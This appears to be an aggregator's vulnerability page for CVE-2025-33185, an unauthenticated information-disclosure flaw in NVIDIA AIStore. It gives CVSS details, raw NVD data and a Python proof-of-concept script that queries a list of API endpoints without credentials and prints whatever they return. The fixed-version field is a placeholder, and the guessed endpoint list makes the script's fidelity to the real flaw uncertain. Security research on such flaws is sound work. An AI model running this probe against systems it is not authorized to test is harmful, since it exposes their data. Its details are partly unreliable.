Security Vulnerability Report
中文
CVE-2025-33185 CVSS 5.3 MEDIUM

CVE-2025-33185

Published: 2025-11-11 17:15:51
Last Modified: 2026-04-15 00:35:42

Description

NVIDIA AIStore contains a vulnerability in AuthN where an unauthenticated user may cause information disclosure.  A successful exploit of this vulnerability may lead to information disclosure.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

NVIDIA AIStore < specific_fixed_version
请参考 NVIDIA 官方安全公告获取确切修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33185 PoC - NVIDIA AIStore Unauthenticated Information Disclosure # Target: NVIDIA AIStore instances with vulnerable AuthN module import requests import sys import json def check_vulnerability(target_url): """ Check if target AIStore instance is vulnerable to CVE-2025-33185 """ # Remove trailing slash if present target_url = target_url.rstrip('/') # List of sensitive endpoints that should require authentication sensitive_endpoints = [ '/api/v1/cluster', '/api/v1/health', '/api/v1/stats', '/api/v1/buckets', '/api/v1/objects' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-33185 - NVIDIA AIStore Information Disclosure") print("=" * 60) vulnerable = False for endpoint in sensitive_endpoints: try: # Send request WITHOUT authentication headers url = f"{target_url}{endpoint}" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we got a successful response without auth if response.status_code == 200: try: data = response.json() print(f"\n[!] VULNERABLE: {endpoint}") print(f" Status Code: {response.status_code}") print(f" Response Preview: {json.dumps(data, indent=2)[:500]}") vulnerable = True except: print(f"\n[!] POTENTIALLY VULNERABLE: {endpoint}") print(f" Status Code: {response.status_code}") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[+] PROTECTED: {endpoint} (Status: {response.status_code})") else: print(f"[*] INFO: {endpoint} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[-] ERROR testing {endpoint}: {str(e)}") print("\n" + "=" * 60) if vulnerable: print("[!] CONCLUSION: Target is VULNERABLE to CVE-2025-33185") print("[!] Unauthenticated information disclosure is possible") return True else: print("[+] CONCLUSION: Target appears to be PATCHED") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-33185-poc.py <target_url>") print("Example: python cve-2025-33185-poc.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33185", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:50.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA AIStore contains a vulnerability in AuthN where an unauthenticated user may cause information disclosure.  A successful exploit of this vulnerability may lead to information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33185", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5724", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33185", "source": "[email protected]"}]}}